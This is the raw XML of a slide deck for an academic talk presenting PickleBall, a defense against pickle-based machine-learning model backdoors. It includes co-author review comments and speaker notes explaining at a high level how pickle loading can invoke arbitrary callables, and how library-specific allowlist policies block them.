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comments+xml" PartName="/ppt/comments/comment1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment2.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment8.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment5.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment6.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment7.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment4.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment9.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+xml" PartName="/ppt/comments/comment3.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide67.xml"/>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68.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73.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide56.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide30.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide69.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61.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide74.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62.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70.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63.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72.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60.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide38.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide64.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6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71.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66.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1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69.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6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71.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide41.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide67.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6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7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73.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65.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72.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64.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide8.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32.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide62.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63.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61.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide31.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide74.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commentAuthors+xml" PartName="/ppt/commentAuthors.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74" r:id="rId6"/>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 id="293" r:id="rId45"/>
    <p:sldId id="294" r:id="rId46"/>
    <p:sldId id="295" r:id="rId47"/>
    <p:sldId id="296" r:id="rId48"/>
    <p:sldId id="297" r:id="rId49"/>
    <p:sldId id="298" r:id="rId50"/>
    <p:sldId id="299" r:id="rId51"/>
    <p:sldId id="300" r:id="rId52"/>
    <p:sldId id="301" r:id="rId53"/>
    <p:sldId id="302" r:id="rId54"/>
    <p:sldId id="303" r:id="rId55"/>
    <p:sldId id="304" r:id="rId56"/>
    <p:sldId id="305" r:id="rId57"/>
    <p:sldId id="306" r:id="rId58"/>
    <p:sldId id="307" r:id="rId59"/>
    <p:sldId id="308" r:id="rId60"/>
    <p:sldId id="309" r:id="rId61"/>
    <p:sldId id="310" r:id="rId62"/>
    <p:sldId id="311" r:id="rId63"/>
    <p:sldId id="312" r:id="rId64"/>
    <p:sldId id="313" r:id="rId65"/>
    <p:sldId id="314" r:id="rId66"/>
    <p:sldId id="315" r:id="rId67"/>
    <p:sldId id="316" r:id="rId68"/>
    <p:sldId id="317" r:id="rId69"/>
    <p:sldId id="318" r:id="rId70"/>
    <p:sldId id="319" r:id="rId71"/>
    <p:sldId id="320" r:id="rId72"/>
    <p:sldId id="321" r:id="rId73"/>
    <p:sldId id="322" r:id="rId74"/>
    <p:sldId id="323" r:id="rId75"/>
    <p:sldId id="324" r:id="rId76"/>
    <p:sldId id="325" r:id="rId77"/>
    <p:sldId id="326" r:id="rId78"/>
    <p:sldId id="327" r:id="rId79"/>
    <p:sldId id="328" r:id="rId80"/>
    <p:sldId id="329" r:id="rId81"/>
  </p:sldIdLst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Inter Light"/>
      <p:regular r:id="rId82"/>
      <p:bold r:id="rId83"/>
      <p:italic r:id="rId84"/>
      <p:boldItalic r:id="rId85"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inter SemiBold"/>
      <p:regular r:id="rId86"/>
      <p:bold r:id="rId87"/>
      <p:italic r:id="rId88"/>
      <p:boldItalic r:id="rId89"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat"/>
      <p:regular r:id="rId90"/>
      <p:bold r:id="rId91"/>
      <p:italic r:id="rId92"/>
      <p:boldItalic r:id="rId93"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inter"/>
      <p:regular r:id="rId94"/>
      <p:bold r:id="rId95"/>
      <p:italic r:id="rId96"/>
      <p:boldItalic r:id="rId97"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Light"/>
      <p:regular r:id="rId98"/>
      <p:bold r:id="rId99"/>
      <p:italic r:id="rId100"/>
      <p:boldItalic r:id="rId101"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Didact Gothic"/>
      <p:regular r:id="rId102"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId103"/>
      <p:bold r:id="rId104"/>
      <p:italic r:id="rId105"/>
      <p:boldItalic r:id="rId106"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inter ExtraLight"/>
      <p:regular r:id="rId107"/>
      <p:bold r:id="rId108"/>
      <p:italic r:id="rId109"/>
      <p:boldItalic r:id="rId110"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Alatsi"/>
      <p:regular r:id="rId111"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Castoro"/>
      <p:regular r:id="rId112"/>
      <p:italic r:id="rId113"/>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commentAuthors.xml><?xml version="1.0" encoding="utf-8"?>
<p:cmAuthor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Author clrIdx="0" id="0" initials="" lastIdx="1" name="Wenxin Jiang"/>
  <p:cmAuthor clrIdx="1" id="1" initials="" lastIdx="12" name="Andreas Kellas"/>
</p:cmAuthorLst>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11C30A3B-6D4B-4216-B4AD-653BF54A5768}">
  <a:tblStyle styleId="{11C30A3B-6D4B-4216-B4AD-653BF54A5768}" styleName="Table_0">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3.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterExtraLight-regular.fntdata"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.fntdata"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterExtraLight-italic.fntdata"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterExtraLight-bold.fntdata"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DidactGothic-regular.fntdata"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-boldItalic.fntdata"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-italic.fntdata"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inter-bold.fntdata"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inter-regular.fntdata"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inter-boldItalic.fntdata"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inter-italic.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-regular.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-bold.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-regular.fntdata"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-boldItalic.fntdata"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-italic.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterExtraLight-boldItalic.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Castoro-italic.fntdata"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Castoro-regular.fntdata"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Alatsi-regular.fntdata"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterLight-italic.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterLight-bold.fntdata"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterSemiBold-regular.fntdata"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterLight-boldItalic.fntdata"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterSemiBold-italic.fntdata"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterSemiBold-bold.fntdata"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterSemiBold-boldItalic.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide73.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterLight-regular.fntdata"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide74.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2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide66.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide65.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide68.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide67.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide70.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide69.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide72.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide71.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide64.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide63.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide55.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide54.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide57.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide56.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide59.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide58.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide61.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide60.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide53.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide62.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide45.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide48.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide47.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide50.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide49.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide52.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide51.xml"/></Relationships>
</file>

<file path=ppt/comments/comment1.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0" idx="1" dt="2025-09-29T13:19:39.398">
    <p:pos x="6000" y="0"/>
    <p:text>Should we put the model format case study here? Just to show that this is *still* a problem if the audience have head about HF using safetensor as a solution</p:text>
  </p:cm>
  <p:cm authorId="1" idx="1" dt="2025-09-23T15:17:43.520">
    <p:pos x="6000" y="100"/>
    <p:text>Why is this still a problem?
* Alternate formats are recommended, like SafeTensors. We measure the ecosystem and find that despite these recommendations, Pickle downloads are increasing
* Model scanners use deny lists that are circumventable
* Restricted loaders, like the weights only unpickler, provide strong security by applying an allowlist during loading. however, the weights only unpickler default policy cannot load many existing models, and library developers explicitly disable it
We need a solution that prevents malicious models from loading, and loads existing benign models without burdening the user.</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment2.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1" idx="2" dt="2025-09-24T19:29:56.527">
    <p:pos x="6000" y="0"/>
    <p:text>Threat Model and Solution Goal
* Our solution must defend against the adversary that manipulates pickle models with the intention of executing arbitrary callables
* The properties of the required solution are: during loading, the system raises a security exception when an unnecessary callable is invoked, but permits models that only use necessary callables to load.</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment3.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1" idx="3" dt="2025-09-26T05:57:21.114">
    <p:pos x="6000" y="0"/>
    <p:text>Key points:
* Existing solutions fail because they are incomplete (deny lists) or apply a default policy that is unusable for models produced by other libraries
* When we see an odd callable in a model, we need to ask: is this supposed to be here, or did an attacker insert it? we can answer the first question by analyzing how libraries define models to derive a spec for serialized models
* There are some challenges with this approach: Python is a challenging language to analyze statically - policies can be both over- and under-approximate</p:text>
  </p:cm>
  <p:cm authorId="1" idx="4" dt="2025-09-26T05:57:21.114">
    <p:pos x="6000" y="0"/>
    <p:text>Being library-sensitive increases the number of benign models we can load.</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment4.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1" idx="5" dt="2025-09-22T21:30:25.891">
    <p:pos x="6000" y="0"/>
    <p:text>PickleBall is implemented in two components:
1. policy generation
2. policy enforcement
The inputs and outputs are ...</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment5.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1" idx="6" dt="2025-09-23T14:32:26.471">
    <p:pos x="6000" y="0"/>
    <p:text>PickleBall analyzes a library's model class definition to create a loading policy. 
The policy represents any callable that could be used to deserialize an object of the model type. callables that do not appear in the policy are not needed during loading.
PickleBall analyzes the type-annotated AST (generated by Joern, with our own fixes and modifications) - which may be over- or under-approximate, because of challenges in statically analyzing Python code.
This means that PickleBall's policies may have more callables than necessary, and can also miss some callablles.
Challenge: when attributes are updated outside of the class definition.</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment6.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1" idx="7" dt="2025-09-30T14:25:02.713">
    <p:pos x="6000" y="0"/>
    <p:text>Conclusion: highlight main point, acknowledge collaborators, and invite questions.
Provide links to source code and artifact.</p:text>
  </p:cm>
  <p:cm authorId="1" idx="8" dt="2025-09-30T04:44:15.494">
    <p:pos x="6000" y="0"/>
    <p:text>Highlight takeaway: when rigid one-size-fits-all policies are not enough, we can approximate a specification with lightweight analysis of a shared interface.</p:text>
  </p:cm>
  <p:cm authorId="1" idx="9" dt="2025-09-30T14:25:02.713">
    <p:pos x="6000" y="0"/>
    <p:text>TODO: add badges when earned</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment7.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1" idx="10" dt="2025-09-23T15:11:10.362">
    <p:pos x="6000" y="0"/>
    <p:text>PickleBall is designed to permit only callables that could appear in models created from libraries and their model classes.
An open question: can attackers abuse these remaining callables in code-reuse style attacks?</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment8.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1" idx="11" dt="2025-09-24T01:35:23.646">
    <p:pos x="6000" y="0"/>
    <p:text>PickleBall enforces policies with a modified version of the Pickle Machine
In addition to restricting the callables that can be imported and invoked, PickleBall implements lazy loading.</p:text>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/comments/comment9.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1" idx="12" dt="2025-09-30T04:42:46.898">
    <p:pos x="6000" y="0"/>
    <p:text>TODO: motivate lazy enforcement</p:tex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4" name="Shape 274"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;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276" name="Google Shape;276;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Intro:</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I’m Andreas, a 5th year PhD student at Columbia University.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Today I am presenting PickleBall, a novel defense against pickle-based model backdoors.</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This work was collaborative between teams at Columbia, Brown, Purdue, Google, and Technion.</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>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6" name="Shape 426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;g388d55caf50_0_25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28" name="Google Shape;428;g388d55caf50_0_25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Attackers abuse the model loading process, where a saved model is deserialized from a file into the program memory.</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While many model serialization formats exist, like SafeTensors, GGUF, and others, the most widely abused is pickle. Almost all discovered backdoors abuse the pickle format.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5" name="Shape 435"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;g384641fc418_0_85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37" name="Google Shape;437;g384641fc418_0_85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So, why do attackers abuse pickle? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Pickle is a very expressive format. Where other serialization formats may only encode the data in model weights and some information about operations, pickle models mix executable code and data.</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Models that use the pickle format are encoded into a series of opcodes. When the model is loaded, these opcodes are executed by a virtual machine implemented in Python’s pickle module - called the “Pickle Machine”. When these opcodes execute, they instantiate the model as a python object and return it to the python program.</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Most of the opcodes are very simple, but they expose functionality to import and invoke Python functions and class constructors (named “callables”). These are needed to construct complex data types like models, and load the weights values from disk.</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These importing and invoking opcodes also give attackers an easy primitive to execute malicious callables – for example, by importing and calling functions like os.system.</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5" name="Shape 445"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;g384641fc418_0_10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47" name="Google Shape;447;g384641fc418_0_10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rPr>
              <a:t>So, why do attackers abuse pickle? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Pickle is a very expressive format. Where other serialization formats may only encode the data in model weights and some information about operations, pickle models mix executable code and data.</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Models that use the pickle format are encoded into a series of opcodes. When the model is loaded, these opcodes are executed by a virtual machine implemented in Python’s pickle module - called the “Pickle Machine”. When these opcodes execute, they instantiate the model as a python object and return it to the python program.</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Most of the opcodes are very simple, but they expose functionality to import and invoke Python functions and class constructors (named “callables”). These are needed to construct complex data types like models, and load the weights values from disk.</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These importing and invoking opcodes also give attackers an easy primitive to execute malicious callables – for example, by importing and calling functions like os.system.</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5" name="Shape 455"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Google Shape;456;g384641fc418_0_100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57" name="Google Shape;457;g384641fc418_0_100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rPr>
              <a:t>So, why do attackers abuse pickle? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Pickle is a very expressive format. Where other serialization formats may only encode the data in model weights and some information about operations, pickle models mix executable code and data.</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Models that use the pickle format are encoded into a series of opcodes. When the model is loaded, these opcodes are executed by a virtual machine implemented in Python’s pickle module - called the “Pickle Machine”. When these opcodes execute, they instantiate the model as a python object and return it to the python program.</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Most of the opcodes are very simple, but they expose functionality to import and invoke Python functions and class constructors (named “callables”). These are needed to construct complex data types like models, and load the weights values from disk.</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These importing and invoking opcodes also give attackers an easy primitive to execute malicious callables – for example, by importing and calling functions like os.system.</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6" name="Shape 466"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
